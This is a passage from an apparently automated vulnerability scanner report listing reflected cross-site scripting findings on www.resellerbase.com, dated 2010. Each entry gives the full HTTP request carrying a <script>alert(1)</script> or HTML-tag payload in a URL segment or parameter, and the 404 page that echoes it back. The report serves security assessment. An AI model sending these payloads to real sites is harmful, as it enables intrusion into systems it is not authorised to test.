<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/34296f8<script>alert(1)</script>bfc6c2579f949b04e/rating.php?id=34&rating=5 was not found on this server.</p>
...[SNIP]...

2.2320. http://www.resellerbase.com/detail/34/rating.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/34/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b6822<script>alert(1)</script>e2443225fa5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/34b6822<script>alert(1)</script>e2443225fa5/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:40:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/34b6822<script>alert(1)</script>e2443225fa5/rating.php was not found on this server.</p>
...[SNIP]...

2.2321. http://www.resellerbase.com/detail/34/rating.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/34/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 69f43<script>alert(1)</script>e49b6c64318 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/34/rating.php69f43<script>alert(1)</script>e49b6c64318 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:40:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/34/rating.php69f43<script>alert(1)</script>e49b6c64318 was not found on this server.</p>
...[SNIP]...

2.2322. http://www.resellerbase.com/detail/34/rating.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/34/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c9ff1<script>alert(1)</script>a1369ea7bb690e8ad was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/34/rating.phpc9ff1<script>alert(1)</script>a1369ea7bb690e8ad?id=34&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/34/vod-cash-com-german.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:27:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/34/rating.phpc9ff1<script>alert(1)</script>a1369ea7bb690e8ad?id=34&rating=5 was not found on this server.</p>
...[SNIP]...

2.2323. http://www.resellerbase.com/detail/34/rating.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/34/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 435f3<script>alert(1)</script>1770c27ee92 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/34/rating.php?435f3<script>alert(1)</script>1770c27ee92=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:39:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/34/rating.php?435f3<script>alert(1)</script>1770c27ee92=1 was not found on this server.</p>
...[SNIP]...

2.2324. http://www.resellerbase.com/detail/34/rating.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/34/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 61b83<script>alert(1)</script>863c139be3a449b7c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/34/rating.php/61b83<script>alert(1)</script>863c139be3a449b7c?id=34&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/34/vod-cash-com-german.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/34/rating.php/61b83<script>alert(1)</script>863c139be3a449b7c?id=34&rating=5 was not found on this server.</p>
...[SNIP]...

2.2325. http://www.resellerbase.com/detail/34/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/34/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 643e9<script>alert(1)</script>9b8da8b7c5b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail643e9<script>alert(1)</script>9b8da8b7c5b/34/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/34/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail643e9<script>alert(1)</script>9b8da8b7c5b/34/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2326. http://www.resellerbase.com/detail/34/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/34/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 40e79<script>alert(1)</script>5e8a65d8c56 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/3440e79<script>alert(1)</script>5e8a65d8c56/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/34/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:26:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/3440e79<script>alert(1)</script>5e8a65d8c56/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2327. http://www.resellerbase.com/detail/34/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/34/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 145b2<script>alert(1)</script>950f85ae605 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/34/search.php145b2<script>alert(1)</script>950f85ae605?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/34/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:26:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/34/search.php145b2<script>alert(1)</script>950f85ae605?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2328. http://www.resellerbase.com/detail/34/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/34/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload d34f5<a>de8b9fa317f was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/34/search.php?keyword=search...&Submit3=Searchd34f5<a>de8b9fa317f&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/34/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/34/search.php?keyword=search...&Submit3=Searchd34f5<a>de8b9fa317f&opt=2 was not found on this server.</p>
...[SNIP]...

2.2329. http://www.resellerbase.com/detail/34/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/34/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 9e0fd<a>67e6f7e5a2 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/34/search.php?keyword=search...9e0fd<a>67e6f7e5a2&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/34/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/34/search.php?keyword=search...9e0fd<a>67e6f7e5a2&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2330. http://www.resellerbase.com/detail/34/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/34/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload d841c<script>alert(1)</script>435f586f5db was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/34/search.php?keyword=search...&Submit3=Search&opt=2&d841c<script>alert(1)</script>435f586f5db=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/34/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/34/search.php?keyword=search...&Submit3=Search&opt=2&d841c<script>alert(1)</script>435f586f5db=1 was not found on this server.</p>
...[SNIP]...

2.2331. http://www.resellerbase.com/detail/34/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/34/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 14ae0<a>f64fd909ad0 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/34/search.php?keyword=search...&Submit3=Search&opt=214ae0<a>f64fd909ad0 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/34/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/34/search.php?keyword=search...&Submit3=Search&opt=214ae0<a>f64fd909ad0 was not found on this server.</p>
...[SNIP]...

2.2332. http://www.resellerbase.com/detail/34/themes/kosmos/images/rating/0.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/34/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d4f13<script>alert(1)</script>a3f5b990938 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaild4f13<script>alert(1)</script>a3f5b990938/34/themes/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:40:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaild4f13<script>alert(1)</script>a3f5b990938/34/themes/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.2333. http://www.resellerbase.com/detail/34/themes/kosmos/images/rating/0.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/34/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7304f<script>alert(1)</script>8b002ebc5f0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/347304f<script>alert(1)</script>8b002ebc5f0/themes/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:40:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/347304f<script>alert(1)</script>8b002ebc5f0/themes/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.2334. http://www.resellerbase.com/detail/34/themes/kosmos/images/rating/0.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/34/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b80b3<script>alert(1)</script>8827b82f346 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/34/themesb80b3<script>alert(1)</script>8827b82f346/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:40:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/34/themesb80b3<script>alert(1)</script>8827b82f346/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.2335. http://www.resellerbase.com/detail/34/themes/kosmos/images/rating/0.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/34/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 444d9<script>alert(1)</script>e4ab716db8b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/34/themes/kosmos444d9<script>alert(1)</script>e4ab716db8b/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:40:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/34/themes/kosmos444d9<script>alert(1)</script>e4ab716db8b/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.2336. http://www.resellerbase.com/detail/34/themes/kosmos/images/rating/0.gif [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/34/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 8ee19<script>alert(1)</script>ca0d86a290a was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/34/themes/kosmos/images8ee19<script>alert(1)</script>ca0d86a290a/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:41:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/34/themes/kosmos/images8ee19<script>alert(1)</script>ca0d86a290a/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.2337. http://www.resellerbase.com/detail/34/themes/kosmos/images/rating/0.gif [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/34/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload caeff<script>alert(1)</script>541c28a5f65 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/34/themes/kosmos/images/ratingcaeff<script>alert(1)</script>541c28a5f65/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:41:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/34/themes/kosmos/images/ratingcaeff<script>alert(1)</script>541c28a5f65/0.gif was not found on this server.</p>
...[SNIP]...

2.2338. http://www.resellerbase.com/detail/34/themes/kosmos/images/rating/0.gif [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/34/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 80e58<script>alert(1)</script>c5d29fdfe41 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/34/themes/kosmos/images/rating/0.gif80e58<script>alert(1)</script>c5d29fdfe41 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:41:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
